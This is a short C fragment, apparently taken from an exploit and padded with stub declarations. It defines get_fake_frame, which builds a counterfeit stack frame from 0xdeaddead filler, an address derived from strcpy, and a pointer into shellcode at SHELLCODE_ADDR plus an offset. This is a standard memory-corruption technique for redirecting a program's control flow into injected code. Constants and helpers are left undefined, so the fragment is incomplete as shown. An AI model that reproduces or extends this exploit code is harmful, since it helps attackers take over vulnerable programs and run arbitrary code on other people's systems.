
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ FRAME_SIZE ;
 long SHELLCODE_ADDR ;
 int get_strcpy_addr () ;
 scalar_t__ malloc (scalar_t__) ;
 int perror (char*) ;

char * get_fake_frame(long offset)
{
  long destcpy_addr;
  long *lp;
  char *frame = (char *)malloc(FRAME_SIZE + 1);

  if(!frame)
  {
    perror("malloc");
    return 0;
  }



  destcpy_addr = get_strcpy_addr() + 0x17000;

  lp = (long *)frame;


  *lp++ = 0x42454746;
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;


  *lp++ = destcpy_addr;
  *lp++ = (SHELLCODE_ADDR + offset);
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;
  *lp++ = 0xdeaddead;
  *lp++ = destcpy_addr+0x200;
  *lp++ = destcpy_addr-0x8;
  *lp++ = 0x0;

  return frame;
}
